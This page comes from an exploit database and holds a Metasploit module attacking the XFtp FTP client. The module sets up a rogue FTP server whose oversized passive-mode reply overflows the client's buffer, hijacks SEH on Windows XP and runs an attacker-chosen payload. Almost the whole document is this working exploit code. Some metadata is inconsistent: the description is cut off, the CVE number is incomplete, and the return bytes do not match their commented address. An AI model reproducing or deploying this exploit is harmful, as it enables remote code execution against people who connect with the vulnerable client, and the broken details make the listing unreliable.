XFtp_client Remote Buffer Overflow



EKU-ID: 918 CVE: 2011 OSVDB-ID: 63812
Author: zombiefx Published: 2011-09-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# $Id: XFtp_client.rb 9525 2010-06-15 07:18:08Z Iraq $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::TcpServer
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'XFtp_client Remote Buffer Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow in the XFtp_client that is triggered
               
            },
            'Author'     =>
                [
                    'zombiefx',  # Original exploit author
                    'dookie'     # MSF module author
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 9525 $',
            'References'     =>
                [
                    [ 'CVE', '2011'],
                    [ 'OSVDB', '63812'],
                    [ 'URL', 'http://www.1337day.com/exploits/16829' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'seh',
                },
            'Payload'        =>
                {
                    'Space'    => 800,
                    'BadChars' => "\x76\x29\x4c\x3d",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP Universal', { 'Ret' => "\xdc\x20\x30" } ], # 0x004021fd  p/p/r in xftp.exe
                ],
            'Privileged'     => false,
            'DisclosureDate' => '5/9/2011',
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
            ], self.class)
    end
 
    def on_client_connect(client)
        return if ((p = regenerate_payload(client)) == nil)
 
        # Let the client log in
        client.get_once
 
        user = "331 Please specify the password.\r\n"
        client.put(user)
 
        client.get_once
        pass = "230 Login successful.\r\n"
        client.put(pass)
 
        # Handle the clients PWD command
        client.get_once
        pwd = "257 \"/\" is current directory.\r\n"
        client.put(pwd)
        client.get_once
 
        sploit = "227 Entering Passive Mode ("
        sploit << rand_text_alpha_upper(2171)
        sploit << make_nops(100)
        sploit << payload.encoded
        sploit << make_nops(900 - (payload.encoded.length))
        sploit << "\xe9\x18\xfc\xff\xff"
        sploit << "\xde\xf5\x90\x5D"
        sploit << [target.ret].pack("A3")
        sploit << ")\r\n"
 
        client.put(sploit)
 
    end
 
end